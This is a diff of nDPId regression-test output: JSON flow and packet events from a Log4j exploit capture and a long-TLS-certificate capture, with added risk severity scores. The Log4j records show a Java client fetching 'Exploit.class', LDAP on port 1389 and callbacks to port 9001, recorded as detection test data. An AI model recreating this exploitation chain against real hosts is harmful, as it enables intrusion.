 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1639425834639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzOBEAAQAY4gKwQ7gqsEO4LvZYAUJNLn5gAAAAAoAJyEDRmAAACBAW0BAIICvIpXHQAAAAAAQMDBw=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1639425834639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1639425834639,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9lr\/2uzmTS5+ZoBJxIDRmAAACBAW0BAIICinhDXHyKVx0AQMDBw=="}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":408,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1639425834639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1639425834639,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADTOBUAAQAY4h6wQ7gqsEO4LvZYAUJNLn5m\/9rs6gBAA5TReAAABAQgK8ilcdSnhDXE="}
-00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834639,"flow_last_seen":1639425834640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1639425834640,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}}
-00863{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425834639,"flow_last_seen":1639425834641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1639425834641,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4":"Binary application transfer","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}}
+00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425834639,"flow_last_seen":1639425834640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"ts_msec":1639425834640,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}}
+01052{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":411,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425834639,"flow_last_seen":1639425834641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"ts_msec":1639425834641,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834645,"flow_last_seen":1639425834645,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1639425834645,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1639425834645,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"ts_msec":1639425834645,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNUUAAQAY\/J6wQ7goKCgof2MojKQYXlfcAAAAAoAJyEK5yAAACBAW0BAIICq5YS5wAAAAAAQMDBw=="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1639425834646,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"ts_msec":1639425834646,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAACgAAEAAQAaMjAoKCh+sEO4KIynYygAAAAAGF5X4UBQAAGmJAAA="}
-00720{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1639425834628,"flow_last_seen":1639425834647,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
-00780{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1639425815407,"flow_last_seen":1639425834697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":869,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1639425834628,"flow_last_seen":1639425834647,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":19,"midstream":0,"ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
+00935{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1639425815407,"flow_last_seen":1639425834697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":869,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00640{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":354,"flow_first_seen":1639425815944,"flow_last_seen":1639425833586,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":861,"flow_avg_l4_payload_len":2,"midstream":0,"ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1639425834645,"flow_last_seen":1639425834646,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55498,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
-00746{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1639425815910,"flow_last_seen":1639425815918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4":"Binary application transfer","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Download"}}
-00746{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1639425834639,"flow_last_seen":1639425834642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4":"Binary application transfer","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Download"}}
-00720{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1639425815682,"flow_last_seen":1639425833591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
+00935{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1639425815910,"flow_last_seen":1639425815918,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}}
+00935{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1639425834639,"flow_last_seen":1639425834642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1756,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48534,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}}
+00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1639425815682,"flow_last_seen":1639425833591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":17,"midstream":0,"ts_msec":1639425834697,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
 00170{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":426,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","total-events-serialized":53}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 426/422
@@ -59,10 +59,10 @@
 ~~ total active/idle flows...: 7/7
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4620647 bytes
-~~ total memory freed........: 4620647 bytes
-~~ total allocations/frees...: 100006/100006
+~~ total memory allocated....: 4703632 bytes
+~~ total memory freed........: 4703632 bytes
+~~ total allocations/frees...: 101596/101596
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 175 chars
-~~ json string max len.......: 903 chars
-~~ json string avg len.......: 541 chars
+~~ json string max len.......: 1058 chars
+~~ json string avg len.......: 618 chars
diff --git a/test/results/long_tls_certificate.pcap.out b/test/results/long_tls_certificate.pcap.out
index d73183ea3..87fe58214 100644
--- a/test/results/long_tls_certificate.pcap.out
+++ b/test/results/long_tls_certificate.pcap.out
@@ -3,10 +3,10 @@
 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1609756181300,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1609756181300,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGqknAqAE8ag9ke9glAbsIXeEZAAAAALAC\/\/9qjwAAAgQFtAEDAwUBAQgKDpRqEwAAAAAEAgAA"}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1609756181671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1609756181671,"pkt":"KDc3AG3IEBMx8Tl2CABFAABAAABAACsGv0lqD2R7wKgBPAG72CWlbC1xCF3hGrASMqDiugAAAgQFrAEBAQEBAQEBAQEBAQEBAQEEAgAA"}
 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1609756181671,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1609756181671,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGqmHAqAE8ag9ke9glAbsIXeEapWwtclAQ\/\/+JLgAA"}
-00836{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1609756181300,"flow_last_seen":1609756181681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1609756181681,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1969,"flow_avg_l4_payload_len":328,"midstream":0,"ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-05032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"long_tls_certificate.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1609756181300,"flow_last_seen":1609756182035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7375,"flow_avg_l4_payload_len":614,"midstream":0,"ts_msec":1609756182035,"l3_proto":"ip4","src_ip":"192.168.1.60","dst_ip":"106.15.100.123","src_port":55333,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"beacon-api.aliyuncs.com","server_names":"*.aliyun.com,manager.channel.aliyun.com,*.ace.aliyun.com,*.acs-internal.aliyuncs.com,*.acs.aliyun.com,*.aicrowd.aliyun.com,*.alibabacloud.co.in,*.alibabacloud.com,*.alibabacloud.com.au,*.alibabacloud.com.hk,*.alibabacloud.com.my,*.alibabacloud.com.sg,*.alibabacloud.com.tw,*.alicdn.com,*.alicloud.com,*.aligroup.aliyun.com,*.alimei.com,*.alink.aliyun.com,*.alios.aliyuncs.com,*.aliplus.com,*.alitranx.aliyun.com,*.aliyun-iot-share.com,*.aliyuncs.com,*.alyms.cn,*.ap-northeast-1.aliyuncs.com,*.ap-south-1.aliyuncs.com,*.ap-southeast-1.aliyuncs.com,*.ap-southeast-2.aliyuncs.com,*.ap-southeast-3.aliyuncs.com,*.ap-southeast-5.aliyuncs.com,*.api.aliyun.com,*.apm.aliyun.com,*.app.aliyun.com,*.asmlink.cn,*.banma.aliyuncs.com,*.base.shuju.aliyun.com,*.bi.aliyun.com,*.biz.aliyun.com,*.bridge.aliyun.com,*.ccc.aliyuncs.com,*.center.aliyun.com,*.citybrain.aliyun.com,*.cloudapp.aliyun.com,*.cloudeagle.cn,*.cloudgame.aliyun.com,*.cn-beijing.aliyuncs.com,*.cn-chengdu.aliyuncs.com,*.cn-guizhou.aliyuncs.com,*.cn-haidian.aliyuncs.com,*.cn-hangzhou-finance.aliyuncs.com,*.cn-hangzhou.aliyuncs.com,*.cn-hongkong.aliyuncs.com,*.cn-huhehaote.aliyuncs.com,*.cn-ningxia.aliyuncs.com,*.cn-north-2-gov-1.aliyuncs.com,*.cn-qingdao-nebula.aliyuncs.com,*.cn-qingdao.aliyuncs.com,*.cn-shanghai-finance-1.aliyuncs.com,*.cn-shanghai.aliyun.com,*.cn-shanghai.aliyuncs.com,*.cn-shenzhen-cloudstone.aliyuncs.com,*.cn-shenzhen-finance-1.aliyuncs.com,*.cn-shenzhen.aliyuncs.com,*.cn-sichuan.aliyuncs.com,*.cn-zhangjiakou.aliyuncs.com,*.connect.aliyun.com,*.console.alibabacloud.com,*.console.alicloud.com,*.console.aliyun.com,*.cs.aliyun.com,*.cschat-ccs.aliyun.com,*.data.aliyun.com,*.dataapi.aliyun.com,*.dataq.aliyuncs.com,*.datav.aliyun.com,*.datav.aliyuncs.com,*.devlops.aliyun.com,*.devops.aliyun.com,*.ditu.aliyun.com,*.domain.aliyun.com,*.dyiot.aliyun.com,*.ebs.aliyun.com,*.emas.aliyun.com,*.emr.aliyun.com,*.enterprise.aliyun.com,*.env.aliyun.com,*.et-industry.aliyun.com,*.eu-central-1.aliyuncs.com,*.eu-west-1.aliyuncs.com,*.fc.aliyun.com,*.feedback.console.aliyun.com,*.gts-x.aliyun.com,*.gts.aliyun.com,*.help-ccs.aliyun.com,*.ialicdn.com,*.in-mumbai.aliyuncs.com,*.iot.aliyun.com,*.jp-fudao.aliyuncs.com,*.linkedmall.aliyun.com,*.linkwan.aliyun.com,*.living.aliyun.com,*.luban.aliyun.com,*.m.aliyun.com,*.market.aliyun.com,*.maxcompute.aliyun.com,*.me-east-1.aliyuncs.com,*.media.aliyun.com,*.microdingtalk.aliyun.com,*.mit.aliyun.com,*.mobile.aliyun.com,*.msea.aliyun.com,*.mts.aliyun.com,*.mvp.aliyun.com,*.nebula.aliyun.com,*.nls.aliyuncs.com,*.odps.aliyun.com,*.ons.aliyun.com,*.ose.aliyun.com,*.pai.data.aliyun.com,*.pcs-gw-cn-beijing.aliyun.com,*.pcs-gw-cn-shanghai.aliyun.com,*.phpwind.com,*.phpwind.net,*.pre-sg-purchase.aliyun.com,*.prepub.aliyun.com,*.product.center.aliyun.com,*.pts.aliyun.com,*.r-app-cn-beijing-data.aliyun.com,*.r-app-cn-hangzhou-data.aliyun.com,*.r-app-cn-shenzhen-data.aliyun.com,*.r-app-data.aliyun.com,*.rdc.aliyun.com,*.rds.aliyun.com,*.reid.aliyun.com,*.sc-cmdb.aliyuncs.com,*.scsp.aliyun.com,*.sg.aliyuncs.com,*.shuju.aliyun.com,*.smart.aliyun.com,*.soc.aliyun.com,*.soc.aliyuncs.com,*.sparenode.com,*.supet.com,*.tburl.in,*.teambition.com,*.teambition.net,*.teambitionapis.com,*.tianchi.aliyun.com,*.toolkit.aliyun.com,*.tv.aliyun.com,*.tw-gaoxiong.aliyuncs.com,*.us-east-1.aliyuncs.com,*.us-west-1.aliyuncs.com,*.webide.aliyun.com,*.yuntu.aliyun.com,account.www.net.cn,alibabacloud.co.in,alibabacloud.com,alibabacloud.com.au,alibabacloud.com.hk,alibabacloud.com.my,alibabacloud.com.sg,alibabacloud.com.tw,alicdn.com,alicloud.com,alimei.com,aliyun-iot-share.com,aliyuncs.com,dc.www.net.cn,dmp.www.net.cn,dns.www.net.cn,panda.www.net.cn,pandavip.www.net.cn,phpwind.com,phpwind.net,scdnphi6.com,sparenode.com,supet.com,tburl.in,teambition.com,teambition.net,teambitionapis.com,tianchi-global.com,whois.www.net.cn,aliyun.com","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"eee3d2bf5f17d17548ac36ba1872951f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2","subjectDN":"C=CN, ST=ZheJiang, L=HangZhou, O=Alibaba (China) Technology Co., Ltd., CN=*.aliyun.com","alpn":"h2,http\/1.1","fingerprint":"2B:C6:82:22:E9:94:09:24:34:E1:5C:F1:24:76:98:75:45:78:53:DA"}}
